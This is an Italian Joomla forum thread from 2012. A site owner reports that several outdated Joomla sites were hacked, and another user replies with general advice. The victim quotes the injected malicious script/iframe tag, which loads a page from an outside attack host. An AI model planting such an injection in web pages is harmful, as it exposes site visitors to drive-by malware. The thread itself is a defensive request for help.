Joomla.it Forum

Non solo Joomla... => Sicurezza => : espressioneweb 13 Mar 2012, 14:20:45

: Siti web hackerati nello stesso giorno e su servizi di Hosting differenti.
: espressioneweb 13 Mar 2012, 14:20:45

Buongiorno,
ringrazio chiunque volesse intervernire perchè non so dove sbattere la testa.
Ad oggi è il nono sito web joomla hackerato su 3 servizi di hostig differenti e tutti gli attacchi sono avvenuti tra le ore 11.00 del 11/03/2013 e le ore 2.00 del 12/03/2012.

Descrizione dei vari siti web e dell'accaduto
Versione Joomla 1.5.18 a 1.5.23 (ok colpa mia non li ho aggiornati)
tutti i file con estensione php e html sono stati "aggiornati" e vi hanno integrato un codice il seguente:

<script language='JavaScript' type='text/javascript' iframe src="http://u95d.info/in.cgi?default" height=1 width=1 frameborder=0>

NB non hanno corrotto tutti i siti web (ad oggi) ma solo alcuni.

Ora vi è qualcun altro coinvolto in questo hackeraggio ed eventalmente prima di trovarsi con molti più siti web defacciati una possibile soluzione.

Grazie in anticipo.

: Re:Siti web hackerati nello stesso giorno e su servizi di Hosting differenti.
: giusebos 13 Mar 2012, 14:33:00

Se i 9 siti sono riconducibili a te con link whois o altro, tipo estensioni scaricate chissà da quale sito........ questi bucatori di siti non hanno dovuto far altro che provare a vedere se dopo il primo anche gli altri non erano aggiornati.

Quello che è accaduto a te accade ogni giorno purtroppo, per contrastare il fenomeno le regole sono sempre le stesse e mi fermo qui, questa sezione del forum parla  da sola....

Non c'è molto da dire, fatti passare l'incazzatura, rimboccati le maniche e ricomincia da capo. ;)